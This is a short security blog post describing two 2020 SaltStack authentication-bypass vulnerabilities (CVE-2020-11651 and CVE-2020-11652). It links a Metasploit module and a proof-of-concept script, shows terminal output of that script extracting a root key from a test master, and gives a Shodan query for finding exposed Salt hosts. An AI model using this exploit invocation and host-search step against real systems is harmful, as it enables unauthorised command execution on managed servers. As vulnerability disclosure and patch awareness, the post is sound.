tags: remote code execution salt stack CVE exploitoftheday

Hacking Salt Stack 2020

Hacking Salt Stack

Firo Solutions Hacking Salt image

Our exploit of today is one affecting two CVE’s for the popular devops tool salt.
Salt is a tool for system administrators to manage and carry out tasks on various computers.
Such as upgrading a large set of computers. Due to easy of use and a wide
variety of supported platforms the tool has grown a bigger and bigger user based and even has a
yearly conference called salt con(https://saltconf.com/).
Two new vulnerabilities was found that where so serious even salt is having
a text on their main page advising people to patch
their salt instance.

CVE-2020-11651

ClearFuncs, the part that is responsible for handling the
authentication and key exchange between a salt server
and client does not validate authentication when calling methods and functions.
This allows a malicious third party to use functions without any authentication.
This could be used to run and execute malicious commands on clients.

Check out ClearFuncs on github:
https://github.com/saltstack/salt/blob/master/salt/master.py#L1993

CVE-2020-11652

ClearFuncs is allowing arbitrary access to methods that can give
an unauthenticated user access to access system directories.

Exploiting

Metasploit(“metasploit-framework/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb”) was fast to write
a module that exploits these vulnerabilities

https://github.com/jasperla/CVE-2020-11651-poc

root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Salt version: 3000.1
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (ip:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651...
[*] root key obtained: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
root@kalimah:~/salt#

Find salt hosts:

shodan salt stack hosts

https://www.shodan.io/search?query=Salt-master

https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
https://vulns.firosolutions.com/view/platform/salt/
https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
https://pypi.org/project/salt
https://en.wikipedia.org/wiki/Salt_(software)